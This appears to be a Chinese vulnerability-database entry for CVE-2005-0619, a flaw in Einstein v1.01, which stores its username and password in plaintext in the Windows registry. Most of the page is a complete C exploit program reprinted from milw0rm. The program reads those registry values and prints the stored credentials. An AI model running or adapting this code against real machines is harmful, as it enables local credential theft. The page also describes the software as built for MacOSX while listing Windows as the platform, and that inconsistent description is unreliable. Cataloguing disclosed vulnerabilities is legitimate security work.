Einstein 注册表敏感信息存储漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108488 漏洞类型 未知
发布时间 2005-02-27 更新时间 2005-02-28
CVE编号 CVE-2005-0619 CNNVD-ID CNNVD-200502-105
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/846
https://www.securityfocus.com/bid/90187
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-105
|漏洞详情
Einstein是一款为MacOSX设计的问题测试软件。Einstein1.0.1在注册表里以明文的形式存储了username和password等敏感信息,本地用户可以以此获得相应权限。
|漏洞EXP
/*******************************************************************

Einstein v1.01 Local Password Disclosure Exploit by Kozan

Application: Einstein v1.01 (and previous versions)
Procuder: Bfriendly.com
Vulnerable Description: Einstein v1.01 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <windows.h>

HKEY hKey;

#define BUFSIZE 100
char username[BUFSIZE], password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\einstein",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "username", NULL, NULL,
              (LPBYTE) username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("En error occured!");
                                return 0;
                       }

                       lRet = RegQueryValueEx( hKey, "password", NULL, NULL,
              (LPBYTE) password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("En error occured!");
                                return 0;
                       }
                       RegCloseKey( hKey );

                       printf("Einstein v1.01 Local Exploit by Kozan\n");
                       printf("Credits to ATmaCA\n");
                       printf("www.netmagister.com  -  www.spyinstructors.com\n");
                       printf("kozan@netmagister.com\n\n");
                       printf("Username: %s\n",username);
                       printf("Password: %s\n",password);

        }
        else{
                printf("Einstein v1.01 is not installed on your system!\n");
        }

       return 0;
}

// milw0rm.com [2005-02-27]
|受影响的产品
Bfriendly.Com Einstein 1.0.1
|参考资料

来源:OSVDB
名称:14212
链接:http://www.osvdb.org/14212
来源:SECTRACK
名称:1013316
链接:http://securitytracker.com/id?1013316
来源:SECUNIA
名称:14455
链接:http://secunia.com/advisories/14455
来源:MILW0RM
名称:846
链接:http://milw0rm.com/exploits/846